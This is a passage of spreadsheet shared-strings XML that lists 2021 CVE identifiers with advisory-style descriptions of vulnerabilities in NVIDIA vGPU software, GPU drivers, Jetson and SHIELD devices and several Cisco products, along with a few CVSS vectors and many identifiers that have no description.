    <t>NVIDIA Virtual GPU Manager NVIDIA vGPU manager contains a vulnerability in the vGPU plugin in which it allows guests to allocate some resources for which the guest is not authorized, which may lead to integrity and confidentiality loss, denial of service, or information disclosure. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1058</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the guest kernel mode driver and vGPU plugin, in which an input data size is not validated, which may lead to tampering of data or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1059</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which an input index is not validated, which may lead to integer overflow, which in turn may cause tampering of data, information disclosure, or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1060</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the guest kernel mode driver and vGPU plugin, in which an input index is not validated, which may lead to tampering of data or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1061</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which a race condition may cause the vGPU plugin to continue using a previously validated resource that has since changed, which may lead to denial of service or information disclosure. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1062</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which an input data length is not validated, which may lead to tampering of data or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1063</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which an input offset is not validated, which may lead to a buffer overread, which in turn may cause tampering of data, information disclosure, or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1064</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which it obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer, which may lead to information disclosure or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1065</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which input data is not validated, which may lead to tampering of data or denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1066</t>
  </si>
  <si>
    <t>NVIDIA vGPU manager contains a vulnerability in the vGPU plugin, in which input data is not validated, which may lead to unexpected consumption of resources, which in turn may lead to denial of service. This affects vGPU version 8.x (prior to 8.6) and version 11.0 (prior to 11.3).</t>
  </si>
  <si>
    <t>CVE-2021-1067</t>
  </si>
  <si>
    <t>NVIDIA SHIELD TV, all versions prior to 8.2.2, contains a vulnerability in the implementation of the RPMB command status, in which an attacker can write to the Write Protect Configuration Block, which may lead to denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-1068</t>
  </si>
  <si>
    <t>NVIDIA SHIELD TV, all versions prior to 8.2.2, contains a vulnerability in the NVDEC component, in which an attacker can read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-1069</t>
  </si>
  <si>
    <t>NVIDIA SHIELD TV, all versions prior to 8.2.2, contains a vulnerability in the NVHost function, which may lead to abnormal reboot due to a null pointer reference, causing data loss.</t>
  </si>
  <si>
    <t>CVE-2021-1070</t>
  </si>
  <si>
    <t>NVIDIA Jetson AGX Xavier Series, Jetson Xavier NX, TX1, TX2, Nano and Nano 2GB, L4T versions prior to 32.5, contains a vulnerability in the apply_binaries.sh script used to install NVIDIA components into the root file system image, in which improper access control is applied, which may lead to an unprivileged user being able to modify system device tree files, leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1071</t>
  </si>
  <si>
    <t>NVIDIA Tegra kernel in Jetson AGX Xavier Series, Jetson Xavier NX, TX1, TX2, Nano and Nano 2GB, all L4T versions prior to r32.5, contains a vulnerability in the INA3221 driver in which improper access control may lead to unauthorized users gaining access to system power usage data, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1072</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.21, contains a vulnerability in GameStream (rxdiag.dll) where an arbitrary file deletion due to improper handling of log files may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1073</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.23, contains a vulnerability in the login flow when a user tries to log in by using a browser, while, at the same time, any other web page is loaded in other tabs of the same browser. In this situation, the web page can get access to the token of the user login session, leading to the possibility that the user’s account is compromised. This may lead to the targeted user’s data being accessed, altered, or lost.</t>
  </si>
  <si>
    <t>CVE-2021-1074</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows installer contains a vulnerability where an attacker with local unprivileged system access may be able to replace an application resource with malicious files. This attack requires a user with system administration rights to execute the installer and requires the attacker to replace the files in a very short time window between file integrity validation and execution. Such an attack may lead to code execution, escalation of privileges, denial of service, and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1075</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver for Windows, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where the program dereferences a pointer that contains a location for memory that is no longer valid, which may lead to code execution, denial of service, or escalation of privileges. Attacker does not have any control over the information and may conduct limited data modification.</t>
  </si>
  <si>
    <t>CVE-2021-1076</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys or nvidia.ko) where improper access control may lead to denial of service, information disclosure, or data corruption.</t>
  </si>
  <si>
    <t>CVE-2021-1077</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux, R450 and R460 driver branch, contains a vulnerability where the software uses a reference count to manage a resource that is incorrectly updated, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1078</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver for Windows, all versions, contains a vulnerability in the kernel driver (nvlddmkm.sys) where a NULL pointer dereference may lead to system crash.</t>
  </si>
  <si>
    <t>CVE-2021-1079</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.22, contains a vulnerability in GameStream plugins where log files are created using NT/System level permissions, which may lead to code execution, denial of service, or local privilege escalation. The attacker does not have control over the consequence of a modification nor would they be able to leak information as a direct result of the overwrite.</t>
  </si>
  <si>
    <t>CVE-2021-1080</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), in which certain input data is not validated, which may lead to information disclosure, tampering of data, or denial of service. This affects vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior 8.7).</t>
  </si>
  <si>
    <t>CVE-2021-1081</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the guest kernel mode driver and Virtual GPU manager (vGPU plugin), in which an input length is not validated, which may lead to information disclosure, tampering of data, or denial of service. This affects vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior 8.7).</t>
  </si>
  <si>
    <t>CVE-2021-1082</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), in which an input length is not validated, which may lead to information disclosure, tampering of data, or denial of service. vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior to 8.7)</t>
  </si>
  <si>
    <t>CVE-2021-1083</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the guest kernel mode driver and Virtual GPU Manager (vGPU plugin), in which an input length is not validated, which may lead to information disclosure, tampering of data, or denial of service. This affects vGPU version 12.x (prior to 12.2) and version 11.x (prior to 11.4).</t>
  </si>
  <si>
    <t>CVE-2021-1084</t>
  </si>
  <si>
    <t>NVIDIA vGPU driver contains a vulnerability in the guest kernel mode driver and Virtual GPU Manager (vGPU plugin), in which an input length is not validated, which may lead to information disclosure, tampering of data or denial of service. This affects vGPU version 12.x (prior to 12.2) and version 11.x (prior to 11.4).</t>
  </si>
  <si>
    <t>CVE-2021-1085</t>
  </si>
  <si>
    <t>NVIDIA vGPU driver contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where there is the potential to write to a shared memory location and manipulate the data after the data has been validated, which may lead to denial of service and escalation of privileges and information disclosure but attacker doesn't have control over what information is obtained. This affects vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior to 8.7).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2021-1086</t>
  </si>
  <si>
    <t>NVIDIA vGPU driver contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where it allows guests to control unauthorized resources, which may lead to integrity and confidentiality loss or information disclosure. This affects vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior to 8.7).</t>
  </si>
  <si>
    <t>CVE-2021-1087</t>
  </si>
  <si>
    <t>NVIDIA vGPU driver contains a vulnerability in the Virtual GPU Manager (vGPU plugin), which could allow an attacker to retrieve information that could lead to a Address Space Layout Randomization (ASLR) bypass. This affects vGPU version 12.x (prior to 12.2), version 11.x (prior to 11.4) and version 8.x (prior to 8.7).</t>
  </si>
  <si>
    <t>CVE-2021-1088</t>
  </si>
  <si>
    <t>NVIDIA GPU and Tegra hardware contain a vulnerability in the internal microcontroller which may allow a user with elevated privileges to utilize debug mechanisms with insufficient access control, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1089</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in nvidia-smi where an uncontrolled DLL loading path may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.</t>
  </si>
  <si>
    <t>CVE-2021-1090</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for control calls where the software reads or writes to a buffer by using an index or pointer that references a memory location after the end of the buffer, which may lead to data tampering or denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1091</t>
  </si>
  <si>
    <t>NVIDIA GPU Display driver for Windows contains a vulnerability where an unprivileged user can create a file hard link that causes the driver to overwrite a file that requires elevated privilege to modify, which could lead to data loss or denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1092</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the NVIDIA Control Panel application where it is susceptible to a Windows file system symbolic link attack where an unprivileged attacker can cause the applications to overwrite privileged files, resulting in potential denial of service or data loss.</t>
  </si>
  <si>
    <t>CVE-2021-1093</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in firmware where the driver contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary, and may lead to denial of service or system crash.</t>
  </si>
  <si>
    <t>CVE-2021-1094</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where an out of bounds array access may lead to denial of service or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1095</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handlers for all control calls with embedded parameters where dereferencing an untrusted pointer may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1096</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver for Windows contains a vulnerability in the NVIDIA kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape where dereferencing a NULL pointer may lead to a system crash.</t>
  </si>
  <si>
    <t>CVE-2021-1097</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it improperly validates the length field in a request from a guest. This flaw allows a malicious guest to send a length field that is inconsistent with the actual length of the input, which may lead to information disclosure, data tampering, or denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1098</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it doesn't release some resources during driver unload requests from guests. This flaw allows a malicious guest to perform operations by reusing those resources, which may lead to information disclosure, data tampering, or denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1099</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin) that could allow an attacker to cause stack-based buffer overflow and put a customized ROP gadget on the stack. Such an attack may lead to information disclosure, data tampering, or denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1100</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager kernel mode driver (nvidia.ko), in which a pointer to a user-space buffer is not validated before it is dereferenced, which may lead to denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1101</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can dereference a NULL pointer, which may lead to denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1102</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can lead to floating point exceptions, which may lead to denial of service. This affects vGPU version 12.x (prior to 12.3), version 11.x (prior to 11.5) and version 8.x (prior 8.8).</t>
  </si>
  <si>
    <t>CVE-2021-1103</t>
  </si>
  <si>
    <t>CVE-2021-1104</t>
  </si>
  <si>
    <t>The RISC-V Instruction Set Manual contains a documented ambiguity for the Machine Trap Vector Base Address (MTVEC) register that may lead to a vulnerability due to the initial state of the register not being defined, potentially leading to information disclosure, data tampering and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1105</t>
  </si>
  <si>
    <t>NVIDIA GPU and Tegra hardware contain a vulnerability in the internal microcontroller which may allow a user with elevated privileges to access debug registers during runtime, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1106</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in nvmap, where writes may be allowed to read-only buffers, which may result in escalation of privileges, complete denial of service, unconstrained information disclosure, and serious data tampering of all processes on the system.</t>
  </si>
  <si>
    <t>CVE-2021-1107</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in nvmap NVMAP_IOC_WRITE* paths, where improper access controls may lead to code execution, complete denial of service, and seriously compromised integrity of all system components.</t>
  </si>
  <si>
    <t>CVE-2021-1108</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in FuSa Capture (VI/ISP), where integer underflow due to lack of input validation may lead to complete denial of service, partial integrity, and serious confidentiality loss for all processes in the system.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2021-1109</t>
  </si>
  <si>
    <t>NVIDIA camera firmware contains a multistep, timing-related vulnerability where an unauthorized modification by camera resources may result in loss of data integrity or denial of service across several streams.</t>
  </si>
  <si>
    <t>CVE-2021-1110</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions on Jetson Xavier contain a vulnerability in camera firmware where a user can change input data after validation, which may lead to complete denial of service and serious data corruption of all kernel components.</t>
  </si>
  <si>
    <t>CVE-2021-1111</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in the NV3P server where any user with physical access through USB can trigger an incorrect bounds check, which may lead to buffer overflow, resulting in limited information disclosure, limited data integrity, and denial of service across all components.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2021-1112</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in nvmap, where a null pointer dereference may lead to complete denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1113</t>
  </si>
  <si>
    <t>NVIDIA camera firmware contains a difficult to exploit vulnerability where a highly privileged attacker can cause unauthorized modification to camera resources, which may result in complete denial of service and partial loss of data integrity for all clients.</t>
  </si>
  <si>
    <t>CVE-2021-1114</t>
  </si>
  <si>
    <t>NVIDIA Linux kernel distributions contain a vulnerability in the kernel crypto node, where use after free may lead to complete denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1115</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for private IOCTLs, where an attacker with local unprivileged system access may cause a NULL pointer dereference, which may lead to denial of service in a component beyond the vulnerable component.</t>
  </si>
  <si>
    <t>CVE-2021-1116</t>
  </si>
  <si>
    <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where a NULL pointer dereference in the kernel, created within user mode code, may lead to a denial of service in the form of a system crash.</t>
  </si>
  <si>
    <t>CVE-2021-1117</t>
  </si>
  <si>
    <t>Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where an attacker through specific configuration and with local unprivileged system access may cause improper input validation, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1118</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where there is the potential to execute privileged operations by the guest OS, which may lead to information disclosure, data tampering, escalation of privileges, and denial of service</t>
  </si>
  <si>
    <t>CVE-2021-1119</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can double-free a pointer, which may lead to denial of service. This flaw may result in a write-what-where condition, allowing an attacker to execute arbitrary code impacting integrity and availability.</t>
  </si>
  <si>
    <t>CVE-2021-1120</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where a string provided by the guest OS may not be properly null terminated. The guest OS or attacker has no ability to push content to the plugin through this vulnerability, which may lead to information disclosure, data tampering, unauthorized code execution, and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1121</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager kernel driver, where a vGPU can cause resource starvation among other vGPUs hosted on the same GPU, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1122</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can dereference a NULL pointer, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1123</t>
  </si>
  <si>
    <t>NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where it can deadlock, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-1125</t>
  </si>
  <si>
    <t>NVIDIA GPU and Tegra hardware contain a vulnerability in the internal microcontroller which may allow a user with elevated privileges to corrupt program data.</t>
  </si>
  <si>
    <t>CVE-2021-1126</t>
  </si>
  <si>
    <t>A vulnerability in the storage of proxy server credentials of Cisco Firepower Management Center (FMC) could allow an authenticated, local attacker to view credentials for a configured proxy server. The vulnerability is due to clear-text storage and weak permissions of related configuration files. An attacker could exploit this vulnerability by accessing the CLI of the affected software and viewing the contents of the affected files. A successful exploit could allow the attacker to view the credentials that are used to access the proxy server.</t>
  </si>
  <si>
    <t>CVE-2021-1127</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface. The vulnerability is due to improper input validation of log file content stored on the affected device. An attacker could exploit this vulnerability by modifying a log file with malicious code and getting a user to view the modified log file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2021-1128</t>
  </si>
  <si>
    <t>A vulnerability in the CLI parser of Cisco IOS XR Software could allow an authenticated, local attacker to view more information than their privileges allow. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain sensitive information within the configuration that otherwise might not have been accessible beyond the privileges of the invoking user.</t>
  </si>
  <si>
    <t>CVE-2021-1129</t>
  </si>
  <si>
    <t>A vulnerability in the authentication for the general purpose APIs implementation of Cisco Email Security Appliance (ESA), Cisco Content Security Management Appliance (SMA), and Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to access general system information and certain configuration information from an affected device. The vulnerability exists because a secure authentication token is not required when authenticating to the general purpose API. An attacker could exploit this vulnerability by sending a crafted request for information to the general purpose API on an affected device. A successful exploit could allow the attacker to obtain system and configuration information from the affected device, resulting in an unauthorized information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-1130</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco DNA Center software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have administrative credentials on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1131</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause an affected IP camera to reload. The vulnerability is due to missing checks when Cisco Discovery Protocol messages are processed. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected IP camera. A successful exploit could allow the attacker to cause the affected IP camera to reload unexpectedly, resulting in a denial of service (DoS) condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2021-1133</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to view, modify, and delete data without proper authorization. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1134</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Identity Services Engine (ISE) integration feature of the Cisco DNA Center Software could allow an unauthenticated, remote attacker to gain unauthorized access to sensitive data. The vulnerability is due to an incomplete validation of the X.509 certificate used when establishing a connection between DNA Center and an ISE server. An attacker could exploit this vulnerability by supplying a crafted certificate and could then intercept communications between the ISE and DNA Center. A successful exploit could allow the attacker to view and alter sensitive information that the ISE maintains about clients that are connected to the network.</t>
  </si>
  <si>
    <t>CVE-2021-1135</t>
  </si>
  <si>
    <t>CVE-2021-1136</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1137</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local attacker to gain escalated privileges on an affected system. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1138</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2021-1139</t>
  </si>
  <si>
    <t>CVE-2021-1140</t>
  </si>
  <si>
    <t>CVE-2021-1141</t>
  </si>
  <si>
    <t>CVE-2021-1142</t>
  </si>
  <si>
    <t>CVE-2021-1143</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Connected Mobile Experiences (CMX) API authorizations could allow an authenticated, remote attacker to enumerate what users exist on the system. The vulnerability is due to a lack of authorization checks for certain API GET requests. An attacker could exploit this vulnerability by sending specific API GET requests to an affected device. A successful exploit could allow the attacker to enumerate users of the CMX system.</t>
  </si>
  <si>
    <t>CVE-2021-1144</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Connected Mobile Experiences (CMX) could allow a remote, authenticated attacker without administrative privileges to alter the password of any user on an affected system. The vulnerability is due to incorrect handling of authorization checks for changing a password. An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device. A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.</t>
  </si>
  <si>
    <t>CVE-2021-1145</t>
  </si>
  <si>
    <t>A vulnerability in the Secure FTP (SFTP) of Cisco StarOS for Cisco ASR 5000 Series Routers could allow an authenticated, remote attacker to read arbitrary files on an affected device. To exploit this vulnerability, the attacker would need to have valid credentials on the affected device. The vulnerability is due to insecure handling of symbolic links. An attacker could exploit this vulnerability by sending a crafted SFTP command to an affected device. A successful exploit could allow the attacker to read arbitrary files on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1146</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-1147</t>
  </si>
  <si>
    <t>CVE-2021-1148</t>
  </si>
  <si>
    <t>CVE-2021-1149</t>
  </si>
  <si>
    <t>CVE-2021-1150</t>
  </si>
  <si>
    <t>CVE-2021-1151</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device.</t>
  </si>
  <si>
    <t>CVE-2021-1152</t>
  </si>
  <si>
    <t>CVE-2021-1153</t>
  </si>
  <si>
    <t>CVE-2021-1154</t>
  </si>
  <si>
    <t>CVE-2021-1155</t>
  </si>
  <si>
    <t>CVE-2021-1156</t>
  </si>
  <si>
    <t>CVE-2021-1157</t>
  </si>
  <si>
    <t>CVE-2021-1158</t>
  </si>
  <si>
    <t>CVE-2021-1159</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2021-1160</t>
  </si>
  <si>
    <t>CVE-2021-1161</t>
  </si>
  <si>
    <t>CVE-2021-1162</t>
  </si>
  <si>
    <t>CVE-2021-1163</t>
  </si>
  <si>
    <t>CVE-2021-1164</t>
  </si>
  <si>
    <t>CVE-2021-1165</t>
  </si>
  <si>
    <t>CVE-2021-1166</t>
  </si>
  <si>
    <t>CVE-2021-1167</t>
  </si>
  <si>
    <t>CVE-2021-1168</t>
  </si>
  <si>
    <t>CVE-2021-1169</t>
  </si>
  <si>
    <t>CVE-2021-1170</t>
  </si>
  <si>
    <t>CVE-2021-1171</t>
  </si>
  <si>
    <t>CVE-2021-1172</t>
  </si>
  <si>
    <t>CVE-2021-1173</t>
  </si>
  <si>
    <t>CVE-2021-1174</t>
  </si>
  <si>
    <t>CVE-2021-1175</t>
  </si>
  <si>
    <t>CVE-2021-1176</t>
  </si>
  <si>
    <t>CVE-2021-1177</t>
  </si>
  <si>
    <t>CVE-2021-1178</t>
  </si>
  <si>
    <t>CVE-2021-1179</t>
  </si>
  <si>
    <t>CVE-2021-1180</t>
  </si>
  <si>
    <t>CVE-2021-1181</t>
  </si>
  <si>
    <t>CVE-2021-1182</t>
  </si>
  <si>
    <t>CVE-2021-1183</t>
  </si>
  <si>
    <t>CVE-2021-1184</t>
  </si>
  <si>
